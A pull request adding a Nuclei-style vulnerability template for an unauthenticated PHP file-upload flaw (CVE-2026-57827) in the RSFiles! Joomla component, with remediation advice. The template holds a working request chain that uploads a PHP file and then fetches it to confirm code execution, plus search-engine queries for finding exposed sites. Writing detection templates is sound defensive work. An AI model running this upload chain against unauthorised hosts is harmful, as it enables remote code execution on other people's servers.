### PR TITLE
Add CVE-2026-57827 - RSFiles! for Joomla - Unauthenticated Arbitrary File Upload RCE

### DIFF
--- a/http/cves/2026/CVE-2026-57827.yaml
+++ b/http/cves/2026/CVE-2026-57827.yaml
@@ -1,23 +1,20 @@
 id: CVE-2026-57827
 
 info:
-  name: "RSFiles! for Joomla - Unauthenticated Arbitrary File Upload RCE (CVE-2026-57827)"
+  name: RSFiles! for Joomla - Arbitrary File Upload
   author: omarkurt
   severity: critical
   description: |
-    RSFiles! (com_rsfiles) for Joomla < 1.17.12 allows unauthenticated arbitrary
-    file upload via the rsfiles.upload task. The write method performs no
-    authentication, CSRF token, or file extension checks, allowing upload of
-    executable PHP files to the web-accessible downloads/ directory.
+    RSFiles! (com_rsfiles) for Joomla < 1.17.12 allows unauthenticated arbitrary file upload via the rsfiles.upload task. The write method performs no authentication, CSRF token, or file extension checks, allowing upload of executable PHP files to the web-accessible downloads/ directory.
   impact: |
     Unauthenticated remote code execution via PHP webshell upload.
   remediation: |
     Update RSFiles! to version 1.17.12 or later.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-57827
     - https://mysites.guru/blog/rsfiles-unauthenticated-file-upload-rce/
     - https://vulnerabletarget.com/VT-2026-57827
     - https://www.rsjoomla.com/blog/view/644-unauthenticated-file-upload-fixed-in-rsfiles-version-11712-update-now.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-57827
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8

--- a/http/cves/2026/CVE-2026-57827.yaml
+++ b/http/cves/2026/CVE-2026-57827.yaml
@@ -1,0 +1,87 @@
+id: CVE-2026-57827
+
+info:
+  name: "RSFiles! for Joomla - Unauthenticated Arbitrary File Upload RCE (CVE-2026-57827)"
+  author: omarkurt
+  severity: critical
+  description: |
+    RSFiles! (com_rsfiles) for Joomla < 1.17.12 allows unauthenticated arbitrary
+    file upload via the rsfiles.upload task. The write method performs no
+    authentication, CSRF token, or file extension checks, allowing upload of
+    executable PHP files to the web-accessible downloads/ directory.
+  impact: |
+    Unauthenticated remote code execution via PHP webshell upload.
+  remediation: |
+    Update RSFiles! to version 1.17.12 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-57827
+    - https://mysites.guru/blog/rsfiles-unauthenticated-file-upload-rce/
+    - https://vulnerabletarget.com/VT-2026-57827
+    - https://www.rsjoomla.com/blog/view/644-unauthenticated-file-upload-fixed-in-rsfiles-version-11712-update-now.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-57827
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: rsjoomla
+    product: rsfiles
+    framework: joomla
+    shodan-query: http.html:"com_rsfiles"
+    fofa-query: body="com_rsfiles"
+  tags: cve,cve2026,joomla,rsjoomla,rsfiles,file-upload,rce,intrusive
+
+variables:
+  marker: "{{to_lower(rand_text_alpha(8))}}"
+
+flow: http(1) && http(2) && http(3)
+
+http:
+  - raw:
+      - |
+        POST /index.php?option=com_rsfiles&task=rsfiles.checkupload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "\"status\":\"ok\"")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /index.php?option=com_rsfiles&task=rsfiles.upload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----RSFilesBoundary57827
+
+        ------RSFilesBoundary57827
+        Content-Disposition: form-data; name="file"; filename="{{marker}}.php"
+        Content-Type: application/x-php
+
+        <?php echo 'VT-2026-57827-{{marker}}'; ?>
+        ------RSFilesBoundary57827--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "\"status\":\"success\"")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /downloads/{{marker}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - "contains(body, 'VT-2026-57827-{{marker}}')"
+        condition: and


### PR DESCRIPTION
Added CVE-2026-57827 for RSFiles! Joomla vulnerability with details on unauthenticated arbitrary file upload leading to RCE.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2026-57827
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [ ] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
